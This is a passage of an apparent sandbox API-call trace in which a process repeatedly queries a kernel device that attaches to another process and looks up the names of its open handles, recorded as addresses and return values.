hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0243.923] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0243.923] PsAcquireProcessExitSynchronization () returned 0x0 [0243.923] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0243.924] ObReferenceObjectByHandle (in: Handle=0x11c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000c80fc0, HandleInformation=0x0) returned 0x0 [0243.924] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0243.924] PsReleaseProcessExitSynchronization () returned 0x2 [0243.924] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x167 [0243.924] ObQueryNameString (in: Object=0xfffff8a000c80fc0, ObjectNameInfo=0xfffffa800315b044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800315b044, ReturnLength=0xfffff880053c8550) returned 0x0 [0243.924] ObfDereferenceObject (Object=0xfffff8a000c80fc0) returned 0x1 [0243.924] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0243.924] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0243.924] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0243.924] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0243.924] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0243.924] PsAcquireProcessExitSynchronization () returned 0x0 [0243.924] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0243.924] ObReferenceObjectByHandle (in: Handle=0x120, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000c6f860, HandleInformation=0x0) returned 0x0 [0243.924] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0243.924] PsReleaseProcessExitSynchronization () returned 0x2 [0243.924] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x167 [0243.924] ObQueryNameString (in: Object=0xfffff8a000c6f860, ObjectNameInfo=0xfffffa800312f044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800312f044, ReturnLength=0xfffff880053c8550) returned 0x0 [0243.924] ObfDereferenceObject (Object=0xfffff8a000c6f860) returned 0x1 [0243.924] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0243.925] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0243.925] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0243.925] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0243.925] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0243.925] PsAcquireProcessExitSynchronization () returned 0x0 [0243.925] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0243.925] ObReferenceObjectByHandle (in: Handle=0x124, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000c85750, HandleInformation=0x0) returned 0x0 [0243.925] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0243.925] PsReleaseProcessExitSynchronization () returned 0x2 [0243.925] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x167 [0243.925] ObQueryNameString (in: Object=0xfffff8a000c85750, ObjectNameInfo=0xfffffa800307b044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800307b044, ReturnLength=0xfffff880053c8550) returned 0x0 [0243.925] ObfDereferenceObject (Object=0xfffff8a000c85750) returned 0x1 [0243.925] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0243.925] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0243.925] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0243.925] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0243.925] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0243.925] PsAcquireProcessExitSynchronization () returned 0x0 [0243.925] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0243.926] ObReferenceObjectByHandle (in: Handle=0x128, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a001571650, HandleInformation=0x0) returned 0x0 [0243.926] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0243.926] PsReleaseProcessExitSynchronization () returned 0x2 [0243.926] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x167 [0243.926] ObQueryNameString (in: Object=0xfffff8a001571650, ObjectNameInfo=0xfffffa800312e044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800312e044, ReturnLength=0xfffff880053c8550) returned 0x0 [0243.926] ObfDereferenceObject (Object=0xfffff8a001571650) returned 0x1 [0243.926] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0243.926] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0243.926] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0243.926] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0243.926] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0243.926] PsAcquireProcessExitSynchronization () returned 0x0 [0243.926] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0243.926] ObReferenceObjectByHandle (in: Handle=0x12c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a0014b2af0, HandleInformation=0x0) returned 0x0 [0243.926] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0243.926] PsReleaseProcessExitSynchronization () returned 0x2 [0243.926] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x167 [0243.926] ObQueryNameString (in: Object=0xfffff8a0014b2af0, ObjectNameInfo=0xfffffa800310c044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800310c044, ReturnLength=0xfffff880053c8550) returned 0x0 [0243.926] ObfDereferenceObject (Object=0xfffff8a0014b2af0) returned 0x1 [0243.926] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0243.926] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0243.926] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0243.926] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0243.927] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0243.927] PsAcquireProcessExitSynchronization () returned 0x0 [0243.927] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0243.927] ObReferenceObjectByHandle (in: Handle=0x140, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000f6a890, HandleInformation=0x0) returned 0x0 [0243.927] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0243.927] PsReleaseProcessExitSynchronization () returned 0x2 [0243.927] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x167 [0243.927] ObQueryNameString (in: Object=0xfffff8a000f6a890, ObjectNameInfo=0xfffffa8003065044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003065044, ReturnLength=0xfffff880053c8550) returned 0x0 [0243.927] ObfDereferenceObject (Object=0xfffff8a000f6a890) returned 0x1 [0243.927] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0243.927] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0243.927] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0243.927] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0243.927] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0243.927] PsAcquireProcessExitSynchronization () returned 0x0 [0243.927] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0243.927] ObReferenceObjectByHandle (in: Handle=0x14c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000f8a750, HandleInformation=0x0) returned 0x0 [0243.927] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0243.927] PsReleaseProcessExitSynchronization () returned 0x2 [0243.927] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x167 [0243.927] ObQueryNameString (in: Object=0xfffff8a000f8a750, ObjectNameInfo=0xfffffa80019dd044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa80019dd044, ReturnLength=0xfffff880053c8550) returned 0x0 [0243.927] ObfDereferenceObject (Object=0xfffff8a000f8a750) returned 0x1 [0243.927] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0243.928] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0243.928] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0243.928] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0243.928] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0243.928] PsAcquireProcessExitSynchronization () returned 0x0 [0243.928] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0243.928] ObReferenceObjectByHandle (in: Handle=0x16c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000f8d4f0, HandleInformation=0x0) returned 0x0 [0243.928] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0243.928] PsReleaseProcessExitSynchronization () returned 0x2 [0243.928] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x167 [0243.928] ObQueryNameString (in: Object=0xfffff8a000f8d4f0, ObjectNameInfo=0xfffffa8003066044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003066044, ReturnLength=0xfffff880053c8550) returned 0x0 [0243.928] ObfDereferenceObject (Object=0xfffff8a000f8d4f0) returned 0x1 [0243.928] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0243.928] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0243.928] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0243.928] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0243.928] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0243.928] PsAcquireProcessExitSynchronization () returned 0x0 [0243.928] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0243.928] ObReferenceObjectByHandle (in: Handle=0x174, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000f9e470, HandleInformation=0x0) returned 0x0 [0243.929] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0243.929] PsReleaseProcessExitSynchronization () returned 0x2 [0243.929] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x167 [0243.929] ObQueryNameString (in: Object=0xfffff8a000f9e470, ObjectNameInfo=0xfffffa8003069044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003069044, ReturnLength=0xfffff880053c8550) returned 0x0 [0243.929] ObfDereferenceObject (Object=0xfffff8a000f9e470) returned 0x1 [0243.929] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0243.929] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0243.929] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0243.929] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0243.929] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0243.929] PsAcquireProcessExitSynchronization () returned 0x0 [0243.929] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0243.929] ObReferenceObjectByHandle (in: Handle=0x17c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000ff29f0, HandleInformation=0x0) returned 0x0 [0243.929] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0243.929] PsReleaseProcessExitSynchronization () returned 0x2 [0243.929] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x167 [0243.929] ObQueryNameString (in: Object=0xfffff8a000ff29f0, ObjectNameInfo=0xfffffa800306a044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800306a044, ReturnLength=0xfffff880053c8550) returned 0x0 [0243.929] ObfDereferenceObject (Object=0xfffff8a000ff29f0) returned 0x1 [0243.929] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0243.929] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0243.929] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0243.929] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0243.930] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0243.930] PsAcquireProcessExitSynchronization () returned 0x0 [0243.930] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0243.930] ObReferenceObjectByHandle (in: Handle=0x180, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000ffb110, HandleInformation=0x0) returned 0x0 [0243.930] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0243.930] PsReleaseProcessExitSynchronization () returned 0x2 [0243.930] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x167 [0243.930] ObQueryNameString (in: Object=0xfffff8a000ffb110, ObjectNameInfo=0xfffffa800306f044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800306f044, ReturnLength=0xfffff880053c8550) returned 0x0 [0243.930] ObfDereferenceObject (Object=0xfffff8a000ffb110) returned 0x1 [0243.930] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0243.930] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0243.930] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0243.930] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0243.930] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0243.930] PsAcquireProcessExitSynchronization () returned 0x0 [0243.930] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0243.930] ObReferenceObjectByHandle (in: Handle=0x184, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000f55bd0, HandleInformation=0x0) returned 0x0 [0243.930] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0243.930] PsReleaseProcessExitSynchronization () returned 0x2 [0243.930] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x167 [0243.931] ObQueryNameString (in: Object=0xfffff8a000f55bd0, ObjectNameInfo=0xfffffa8003071044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003071044, ReturnLength=0xfffff880053c8550) returned 0x0 [0243.931] ObfDereferenceObject (Object=0xfffff8a000f55bd0) returned 0x1 [0243.931] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0243.931] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0243.931] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0243.931] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0243.931] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0243.931] PsAcquireProcessExitSynchronization () returned 0x0 [0243.931] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0243.931] ObReferenceObjectByHandle (in: Handle=0x1bc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a0010e9270, HandleInformation=0x0) returned 0x0 [0243.931] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0243.931] PsReleaseProcessExitSynchronization () returned 0x2 [0243.931] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x167 [0243.931] ObQueryNameString (in: Object=0xfffff8a0010e9270, ObjectNameInfo=0xfffffa8003073044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003073044, ReturnLength=0xfffff880053c8550) returned 0x0 [0243.931] ObfDereferenceObject (Object=0xfffff8a0010e9270) returned 0x1 [0243.931] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0243.931] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0243.931] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0243.931] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0243.931] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0243.931] PsAcquireProcessExitSynchronization () returned 0x0 [0243.931] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0243.931] ObReferenceObjectByHandle (in: Handle=0x1c0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a0010fb850, HandleInformation=0x0) returned 0x0 [0243.932] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0243.932] PsReleaseProcessExitSynchronization () returned 0x2 [0243.932] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x167 [0243.932] ObQueryNameString (in: Object=0xfffff8a0010fb850, ObjectNameInfo=0xfffffa8003075044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003075044, ReturnLength=0xfffff880053c8550) returned 0x0 [0243.932] ObfDereferenceObject (Object=0xfffff8a0010fb850) returned 0x1 [0243.932] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0243.932] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0243.932] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0243.932] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0243.932] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0243.932] PsAcquireProcessExitSynchronization () returned 0x0 [0243.932] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0243.932] ObReferenceObjectByHandle (in: Handle=0x1dc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000ca14f0, HandleInformation=0x0) returned 0x0 [0243.932] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0243.932] PsReleaseProcessExitSynchronization () returned 0x2 [0243.932] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x167 [0243.932] ObQueryNameString (in: Object=0xfffff8a000ca14f0, ObjectNameInfo=0xfffffa8003076044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003076044, ReturnLength=0xfffff880053c8550) returned 0x0 [0243.932] ObfDereferenceObject (Object=0xfffff8a000ca14f0) returned 0x1 [0243.932] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0243.932] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea15e0 | out: hHeap=0x1b0000) returned 1 [0243.932] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0243.932] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, 